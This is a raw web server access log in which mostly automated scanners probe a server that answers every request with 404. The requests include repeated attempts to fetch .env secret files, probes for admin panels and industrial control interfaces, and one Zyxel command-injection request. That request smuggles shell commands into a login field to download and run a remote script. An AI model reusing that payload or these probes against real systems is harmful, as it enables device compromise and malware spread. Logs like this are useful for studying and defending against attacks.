generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 994/1157] 167.248.133.117 () {28 vars in 312 bytes} [Sat Feb 12 10:16:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 995/1158] 167.248.133.117 () {34 vars in 444 bytes} [Sat Feb 12 10:16:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 996/1159] 109.237.103.38 () {36 vars in 524 bytes} [Sat Feb 12 10:33:18 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 81/1160] 183.136.225.56 () {34 vars in 456 bytes} [Sat Feb 12 11:07:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 997/1161] 216.218.206.66 () {28 vars in 308 bytes} [Sat Feb 12 11:45:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 998/1162] 83.97.20.34 () {30 vars in 328 bytes} [Sat Feb 12 11:47:03 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 999/1163] 104.131.59.242 () {32 vars in 440 bytes} [Sat Feb 12 11:48:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1000/1164] 35.195.93.98 () {42 vars in 562 bytes} [Sat Feb 12 12:26:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1001/1165] 109.237.103.9 () {36 vars in 523 bytes} [Sat Feb 12 12:43:30 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1002/1166] 83.97.20.34 () {26 vars in 287 
bytes} [Sat Feb 12 13:17:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1003/1167] 109.237.103.118 () {36 vars in 525 bytes} [Sat Feb 12 13:26:28 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1004/1168] 95.29.80.204 () {32 vars in 469 bytes} [Sat Feb 12 14:32:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1005/1169] 128.14.141.34 () {34 vars in 564 bytes} [Sat Feb 12 14:56:13 2022] GET /Telerik.Web.UI.WebResource.axd?type=rau => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1006/1170] 192.241.208.81 () {34 vars in 394 bytes} [Sat Feb 12 15:18:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1007/1171] 101.132.125.197 () {34 vars in 431 bytes} [Sat Feb 12 15:36:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1008/1172] 154.209.125.38 () {34 vars in 459 bytes} [Sat Feb 12 16:10:01 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1009/1173] 67.245.195.96 () {28 vars in 307 bytes} [Sat Feb 12 16:54:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1010/1174] 45.143.144.187 () {36 vars in 524 bytes} [Sat Feb 12 17:00:11 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1011/1175] 45.143.144.187 () {40 vars in 631 bytes} [Sat Feb 12 17:00:11 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1012/1176] 185.163.109.66 () {34 vars in 537 bytes} [Sat Feb 12 17:46:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1013/1177] 185.163.109.66 () {30 vars in 360 bytes} [Sat Feb 12 17:46:07 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1014/1178] 185.163.109.66 () {30 vars in 362 bytes} [Sat Feb 12 17:46:08 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1015/1179] 185.163.109.66 () {30 vars in 388 bytes} [Sat Feb 12 17:46:08 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1016/1180] 185.163.109.66 () {36 vars in 515 bytes} [Sat Feb 12 17:46:13 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1017/1181] 62.171.150.168 () {28 vars in 311 bytes} [Sat Feb 12 18:42:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1018/1182] 62.171.150.168 () {40 vars in 678 bytes} [Sat Feb 12 18:42:23 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1019/1183] 83.97.20.34 () {26 vars in 286 bytes} [Sat Feb 12 19:03:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1020/1184] 132.145.39.16 () {36 vars in 523 bytes} [Sat Feb 12 19:50:14 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1021/1185] 132.145.39.16 () {40 vars 
in 630 bytes} [Sat Feb 12 19:50:14 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1022/1186] 20.125.192.78 () {36 vars in 523 bytes} [Sat Feb 12 20:25:37 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1023/1187] 20.125.192.78 () {40 vars in 630 bytes} [Sat Feb 12 20:25:38 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1024/1188] 39.98.247.172 () {34 vars in 459 bytes} [Sat Feb 12 20:49:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1025/1189] 185.180.143.79 () {34 vars in 488 bytes} [Sat Feb 12 20:58:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1026/1190] 185.180.143.79 () {34 vars in 512 bytes} [Sat Feb 12 20:58:24 2022] GET /showLogin.cc => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1027/1191] 85.202.169.88 () {40 vars in 567 bytes} [Sat Feb 12 21:15:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1028/1192] 209.17.97.90 () {30 vars in 409 bytes} [Sat Feb 12 22:41:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1029/1193] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 12 22:48:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1030/1194] 192.241.212.219 () {34 vars in 419 bytes} [Sun Feb 13 00:12:23 2022] GET /ReportServer => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches 
on core 0) +[pid: 19148|app: 0|req: 1031/1195] 128.1.248.42 () {34 vars in 486 bytes} [Sun Feb 13 00:15:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1032/1196] 223.94.89.20 () {30 vars in 435 bytes} [Sun Feb 13 00:30:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1033/1197] 156.96.154.71 () {36 vars in 523 bytes} [Sun Feb 13 00:30:49 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1034/1198] 156.96.154.71 () {40 vars in 630 bytes} [Sun Feb 13 00:30:51 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1035/1199] 156.96.154.71 () {36 vars in 523 bytes} [Sun Feb 13 00:31:38 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1036/1200] 156.96.154.71 () {40 vars in 630 bytes} [Sun Feb 13 00:31:40 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1037/1201] 157.56.165.117 () {36 vars in 524 bytes} [Sun Feb 13 00:49:30 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1038/1202] 157.56.165.117 () {40 vars in 631 bytes} [Sun Feb 13 00:49:30 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1039/1203] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 13 01:00:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1040/1204] 157.56.165.117 () {36 vars in 524 bytes} [Sun Feb 13 01:02:52 2022] GET /.env => generated 179 bytes in 
1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1041/1205] 157.56.165.117 () {40 vars in 631 bytes} [Sun Feb 13 01:02:52 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1042/1206] 183.136.225.56 () {34 vars in 535 bytes} [Sun Feb 13 02:34:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1043/1207] 47.101.154.181 () {34 vars in 430 bytes} [Sun Feb 13 02:36:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1044/1208] 47.102.102.235 () {34 vars in 432 bytes} [Sun Feb 13 02:37:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1045/1209] 188.137.43.235 () {32 vars in 465 bytes} [Sun Feb 13 03:16:36 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1046/1210] 101.132.102.65 () {34 vars in 427 bytes} [Sun Feb 13 04:35:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1047/1211] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 13 04:42:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1048/1212] 184.105.139.67 () {28 vars in 308 bytes} [Sun Feb 13 04:57:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1049/1213] 47.103.99.103 () {34 vars in 426 bytes} [Sun Feb 13 06:37:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 5/1214] 83.97.20.34 () {26 vars in 284 bytes} [Sun Feb 13 
06:57:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1050/1215] 183.191.123.49 () {32 vars in 472 bytes} [Sun Feb 13 07:18:13 2022] GET http://www.baidu.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1051/1216] 183.191.123.49 () {32 vars in 466 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.rfa.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1052/1217] 183.191.123.49 () {32 vars in 478 bytes} [Sun Feb 13 07:18:20 2022] GET http://wujieliulan.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 13/1218] 183.191.123.49 () {32 vars in 478 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.minghui.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 14/1219] 183.191.123.49 () {22 vars in 275 bytes} [Sun Feb 13 07:18:20 2022] CONNECT www.voanews.com:443 => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 13/1220] 183.191.123.49 () {32 vars in 487 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.epochtimes.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 82/1221] 183.191.123.49 () {32 vars in 472 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.boxun.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 38/1222] 183.191.123.49 () {32 vars in 469 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.bing.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 39/1223] 183.191.123.49 () {32 vars in 475 bytes} [Sun Feb 
13 07:18:20 2022] GET http://www.123cha.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1053/1224] 198.199.113.192 () {34 vars in 423 bytes} [Sun Feb 13 08:29:11 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1054/1225] 192.241.205.238 () {34 vars in 425 bytes} [Sun Feb 13 08:52:20 2022] GET /actuator/health => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1055/1226] 167.94.138.47 () {28 vars in 310 bytes} [Sun Feb 13 09:34:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1056/1227] 167.94.138.47 () {34 vars in 442 bytes} [Sun Feb 13 09:34:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1057/1228] 193.118.53.210 () {34 vars in 488 bytes} [Sun Feb 13 09:34:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1058/1229] 196.3.62.14 () {32 vars in 461 bytes} [Sun Feb 13 10:47:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1059/1230] 175.178.104.30 () {36 vars in 670 bytes} [Sun Feb 13 11:08:23 2022] GET /phpmyadmin4.8.5/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1060/1231] 166.70.97.107 () {36 vars in 523 bytes} [Sun Feb 13 11:35:51 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 83/1232] 166.70.97.107 () {40 vars in 630 bytes} [Sun Feb 13 11:35:52 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 
headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1061/1233] 34.140.248.32 () {42 vars in 561 bytes} [Sun Feb 13 12:01:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1062/1234] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 13 12:58:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1063/1235] 128.14.209.162 () {34 vars in 488 bytes} [Sun Feb 13 16:38:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1064/1236] 135.180.146.73 () {30 vars in 437 bytes} [Sun Feb 13 16:40:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1065/1237] 116.233.200.101 () {26 vars in 299 bytes} [Sun Feb 13 16:59:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1066/1238] 116.233.200.101 () {30 vars in 341 bytes} [Sun Feb 13 16:59:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1067/1239] 116.233.200.101 () {42 vars in 799 bytes} [Sun Feb 13 16:59:27 2022] POST /cgi-bin/luci/;stok=/locale?form=lang => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1068/1240] 116.233.200.101 () {30 vars in 341 bytes} [Sun Feb 13 16:59:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1069/1241] 116.233.200.101 () {30 vars in 371 bytes} [Sun Feb 13 16:59:28 2022] GET /navigation.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1070/1242] 116.233.200.101 () 
{30 vars in 341 bytes} [Sun Feb 13 16:59:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1071/1243] 116.233.200.101 () {30 vars in 341 bytes} [Sun Feb 13 16:59:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1072/1244] 116.233.200.101 () {30 vars in 341 bytes} [Sun Feb 13 16:59:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1073/1245] 116.233.200.101 () {30 vars in 424 bytes} [Sun Feb 13 16:59:28 2022] GET /fx_plcinf.html?CMD=Monitor%20Start&LANG=EN => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1074/1246] 116.233.200.101 () {30 vars in 365 bytes} [Sun Feb 13 16:59:28 2022] GET /KingViewWeb/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1075/1247] 116.233.200.101 () {30 vars in 367 bytes} [Sun Feb 13 16:59:29 2022] GET /ifixwebspace/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1076/1248] 116.233.200.101 () {30 vars in 367 bytes} [Sun Feb 13 16:59:29 2022] GET /webconfig.ini => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1077/1249] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 13 17:27:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1078/1250] 47.102.98.20 () {40 vars in 599 bytes} [Sun Feb 13 17:47:52 2022] GET /index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1079/1251] 47.102.98.20 () {38 vars in 592 bytes} [Sun Feb 13 17:47:52 2022] GET 
/phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1080/1252] 209.17.96.58 () {30 vars in 409 bytes} [Sun Feb 13 18:10:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1081/1253] 31.210.20.81 () {28 vars in 309 bytes} [Sun Feb 13 18:25:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1082/1254] 31.210.20.81 () {36 vars in 853 bytes} [Sun Feb 13 18:25:20 2022] GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bcd%20/tmp%3Brm%20wget.sh;wget%20http%3A//136.144.41.151/multi/wget.sh%20-O-%20>s;chmod%20777%20s;sh%20s%20Exploit.Zyxel;+%23&password=asdf => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1083/1255] 138.204.57.68 () {32 vars in 463 bytes} [Sun Feb 13 18:55:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1084/1256] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 13 19:04:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1085/1257] 23.250.19.242 () {34 vars in 536 bytes} [Sun Feb 13 19:38:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 84/1258] 23.250.19.242 () {30 vars in 359 bytes} [Sun Feb 13 19:38:23 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1086/1259] 23.250.19.242 () {30 vars in 361 bytes} [Sun Feb 13 19:38:24 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 85/1260] 23.250.19.242 () 
{30 vars in 387 bytes} [Sun Feb 13 19:38:25 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1087/1261] 23.250.19.242 () {36 vars in 514 bytes} [Sun Feb 13 19:38:26 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1088/1262] 35.195.93.98 () {42 vars in 562 bytes} [Sun Feb 13 19:38:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1089/1263] 154.89.5.84 () {30 vars in 326 bytes} [Sun Feb 13 19:40:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1090/1264] 138.255.150.42 () {32 vars in 465 bytes} [Sun Feb 13 20:04:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1091/1265] 138.255.150.155 () {32 vars in 471 bytes} [Sun Feb 13 20:04:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1092/1266] 177.38.179.57 () {32 vars in 464 bytes} [Sun Feb 13 20:21:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1093/1267] 136.144.41.117 () {40 vars in 568 bytes} [Sun Feb 13 21:02:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1094/1268] 192.241.206.58 () {34 vars in 428 bytes} [Sun Feb 13 21:07:12 2022] GET /manager/text/list => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1095/1269] 185.67.218.159 () {32 vars in 471 bytes} [Sun Feb 13 21:17:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 
headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1096/1270] 39.100.36.160 () {34 vars in 459 bytes} [Sun Feb 13 22:32:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1097/1271] 107.189.10.196 () {28 vars in 311 bytes} [Sun Feb 13 22:34:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1098/1272] 107.189.10.196 () {40 vars in 672 bytes} [Sun Feb 13 22:34:34 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1099/1273] 83.97.20.34 () {30 vars in 328 bytes} [Sun Feb 13 22:56:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1100/1274] 109.237.103.9 () {36 vars in 523 bytes} [Sun Feb 13 23:38:42 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1101/1275] 192.241.205.55 () {34 vars in 418 bytes} [Mon Feb 14 00:05:30 2022] GET /manager/html => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1102/1276] 192.241.211.58 () {34 vars in 394 bytes} [Mon Feb 14 00:18:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1103/1277] 103.207.42.130 () {36 vars in 590 bytes} [Mon Feb 14 00:31:40 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1104/1278] 103.207.42.130 () {40 vars in 697 bytes} [Mon Feb 14 00:31:41 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1105/1279] 103.207.42.130 () {36 vars in 590 bytes} [Mon Feb 
